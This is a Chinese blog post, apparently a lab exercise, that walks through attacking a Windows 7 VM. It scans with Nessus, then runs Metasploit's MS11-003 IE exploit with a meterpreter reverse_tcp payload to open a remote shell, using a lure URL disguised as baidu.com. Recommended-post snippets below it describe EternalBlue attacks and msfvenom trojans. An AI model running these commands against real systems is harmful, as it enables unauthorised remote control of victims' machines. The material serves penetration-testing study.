metasploit攻击win7

最新推荐文章于 2024-06-24 18:11:49 发布
最新推荐文章于 2024-06-24 18:11:49 发布
阅读量339 收藏 1
点赞数
分类专栏: 渗透测试/
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dkpower111/article/details/115267802
版权

本实验使用到的工具为nessus 、win7\kali

首先。获得靶机ip(10.1.1.129)
关闭win7防火墙

攻击开始:
在Kali上启动nussus服务(/etc/init.d/nessusd start)
访问Nessus控制端https://127.0.0.1:8834/
在这里插入图片描述在这里插入图片描述
使用nusses的作用是对靶机进行扫描,寻找它可以利用的漏洞
新建一个扫描,依次选择“New Scan”-“Basic Network Scan”
在这里插入图片描述
配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描

在这里插入图片描述
扫描结束后,Nessus会很直观的显示出目标网段的安全情况。下图显示了整个网段的安全信息。Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。
在这里插入图片描述
重点关注10.1.1.129
点击就完了 有一个漏洞可以利用 ms11_030

在kali启动metasploit 输入msfconsole
运行命令 use exploit/windows/browser/ms11_003_ie_css_import 选择漏洞利用EXP
在这里插入图片描述
查看配置选项
设置生成的恶意网络 set URIPATH baidu.com
设置服务器端口为8060 set SRVPORT 8060
设置攻击负载 set PAYLOAD windows/meterpreter/reverse_tcp
设置LHOST绑定本地IP set LHOST 10.1.1.128
设置LHOST set LPORT 8866
开始攻击 exploit
在靶机打开IE 输入http://10.1.1.128:8060/baidu.com

然后kali上出现这样的东西就说明攻击成功

在这里插入图片描述
https://www.pianshen.com/article/7145927/

dkpower111
关注
专栏目录
Metasploit攻击win7实例——利用MS11_003 IE漏洞攻击win7主机
weixin_47731659的博客
01-19 1881
攻击流程 环境配置: 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 使用工具: Nessus+metasploit 利用Nessus扫描目标主机 启动Nessus服务 /etc/init.d/nessusd start 访问Nessus控制端https://127.0.0.1:8834/ 配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描
Metasploit攻击win7实例
weixin_54992237的博客
10-26 177
实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。 Nessus基本介绍 Nessus是一个功能强大而又易于使用的网络和主机漏洞评估工具,分为免费的家庭版和付费的企业版。Nessus6.0以后采取Browser/Server模式,Server端负责进行安全检查、具体的扫描任务,客户端用来配置管理服务器端。服务端采用plug-in的体系,允许用户加入执行特定功能的插件,这插件可以进行更快
Msf攻击Win7
07-09
Msf攻击Win7 metasploit
Metasploit攻击win7实例(下)
jjxsir的博客
12-24 2715
配置扫描信息,主要设置扫描名称、描述和扫描目标三个信息即可,其他配置选择默认,配置完成点击Save。选择对整个10.1.1.0/24网段进行扫描,如下图所示。 图12 配置Nessus扫描 扫描结束后,Nessus会很直观的显示出目标网段的安全情况。下图显示了整个网段的安全信息。Nessus将安全问题归类为Info/Low/Medium/High/Critical五个等级,其中Critical等级的问题是最危险的,Info级别的问题通常是无关痛痒的信息显示问题。 图13 Nessus扫描网段结果 重点关
Metasploit渗透测试之制作隐藏后门(一)——使用永恒之蓝漏洞对win7进行渗透
最新发布
qq_63831588的博客
06-24 624
kali,永恒之蓝,漏洞利用,后门,远程连接,木马
Metasploit入侵win7
qq_53030229的博客
11-07 2067
文章目录一、Metasploit是什么?1、Auxiliaries(辅助模块)2、Exploit(渗透攻击模块)3、payload(攻击载荷模块)4、Post(后期渗透模块)5、Encoder(编码工具模块)二、Metasploit入侵步骤1.引入库2.读入数据 一、Metasploit是什么? 这里我简单介绍一下,方便你们小白了解(大佬直接跳过就行) Metasploit框架是一个开源工具,旨在方便渗透测试,他是有ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发,使用定制的工具模板
Metasploit利用永恒之蓝漏洞攻击WIN7靶机
lin__ying的博客
11-21 322
8.指定攻击载荷,以控制受攻击的目标系统并通过已经设置的漏洞利用模块或有效负载来攻击目标系统。9.进入到了win7系统并得到了最高权限,用chcp 65001修改编码。7.显示可用的攻击载荷(payloads)以及其详细信息。3.显示当前选定模块的可用选项及其当前设置的值。4.指定攻击目标的远程主机的 IP 地址。1.进入msfconsole。6.退出该模块,进入攻击模块。查看win10 IP地址。
使用Metasploit渗透攻击Windows7并远程执行命令
Grit的博客
07-28 2033
声明:本博文仅供学习交流,请自觉遵守法律法规 环境 实验环境:kali系统,Windows7 kali IP:192.168.38.136 win7 IP:192.168.38.56 大家可以将这两个操作系统安装到虚拟机中,或者用两台电脑进行实验。 Metasploit简介 Metasploit是目前世界上领先的渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它彻底改变了我们执行安全测试的方式。 Metasploit之所以流行,是因为它可以执行广泛的安全测试任务,从而简化渗透测试的工作。
Metasploit简单利用及入侵Windows7案例.docx
11-13
### Metasploit简单利用及入侵Windows7案例 #### 一、MS17_010漏洞利用实验 ##### 1. 发起漏洞探测 - **背景介绍**:本实验选择了MS17_010(永恒之蓝)漏洞进行攻击尝试。此漏洞允许攻击者在未打补丁的Windows...
Metasploit攻击winserver2008实例
qwerzxcvb123的博客
03-31 3453
Metasploit攻击winserver2008实例 一、实验目的 1)了解拒绝服务攻击的原理及其危害 2)了解SMB协议及其漏洞信息 3)使用Metasploit对win2008系统进行拒绝服务攻击 二、实验环境 漏洞主机:win server 2008,IP地址:10.1.1.144 攻击主机:Kali linux,IP地址:10.1.1.128 三、实验内容与实验要求 初步了解实验环境及...
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
weixin_46035615的博客
04-14 4774
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机并远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
Metasploit攻击win7实例(上)
jjxsir的博客
12-24 538
一、实验目的 通过该实验熟悉Nessus漏洞扫描工具的安装和主机漏洞扫描的方法,学会利用Nessus扫描结果筛选合适的Metasploit攻击模块进行安全测试、攻击。 二、实验环境 图1 实验拓扑图 漏洞主机:win7,IP地址:10.1.1.129 攻击主机:Kali linux,IP地址:10.1.1.128 三、实验内容与实验要求 初步了解实验环境及Nessus安装 利用Nessus扫描目标主机 利用MS11_003 IE漏洞攻击win7主机 四、实验过程与分析 1.查看win7漏洞主机的登录用户及
利用metasploit工具 渗透win7*
m0_46168255的博客
02-18 1046
利用metasploit工具 渗透win7 工具:kali linux ,win7 ,一个灵活的头脑 第一次写博客,写的不好请见谅。话不多说,开始。 首先打开metasploit工具,见图 每次打开这个工具大时候欢迎界面都是随机的,大家要注意。 exploits代表渗透模块 auxiliary代表辅助模块 post代表后渗透模块 payload代表攻击模块 encoders代表编码模块 不过常用...
Metasploit内网安全渗透win7
m0_65364832的博客
01-16 1598
在Kali Linux中使用Metasploit通过ms17_010(永恒之蓝)对同一局域网下的主机的445端口和139端口进行内网渗透测试。通过实践操作,了解渗透测试基本过程。
使用Metasploit渗透攻击windows系统(一)
weixin_30633507的博客
01-27 921
攻击机:kaili ip:192.168.80.157 目标机:win7 IP:192.168.80.158 这里用两种方法去创建meterpreter会话: 1)利用kali中的msfvenom生成木马,在目标机上运行,具体步骤如下: 常用参数: -p选择攻击的payload-l载荷列表-f生成的文件格式-e编码方式-i编码次数-b在生成的程序中避...
metasploit怎么渗透windows7
weixin_42576410的博客
02-14 235
Metasploit 是一款开源的渗透测试工具,可以用来检测和利用操作系统和应用程序的漏洞。如果您想渗透 Windows 7 系统,您可以按照以下步骤操作: 安装 Metasploit:您可以从 Metasploit 官方网站下载安装包进行安装。 启动 Metasploit:在 Windows 下您可以打开命令提示符,输入 msfconsole 启动 Metasploit。 选择目标:您需要...
Metasploit入侵win7系统
weixin_45092418的博客
06-18 2273
Metasploit入侵win7系统一:实验环境二:获得信息a.获得网络拓扑图b.获得主机ip和目标ip三:实施入侵a.打开控制终端b.查找漏洞c.进行配置四:对主机进行操作五:做个守法的好青年 一:实验环境 主机:安装有Metasploit的kali linux 操作系统 目标:已关闭防火墙的win7系统 二:获得信息 a.获得网络拓扑图 画出网络拓扑图,确定你和目标主机在同一局域网下。 b.获得主机ip和目标ip 1.主机ip:ifconifg 这里的eth0是你有线连接的ip地址,也是lhost。
Kali Linux攻击Win7实战指南
然后,将`payload.exe`传输到Win7系统并执行,这样Kali就可以通过Meterpreter会话控制Win7。在Kali上,启动MSF Console并设置Payload: ``` msfconsole use exploit/multi/handlers set payload windows/meterpreter...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值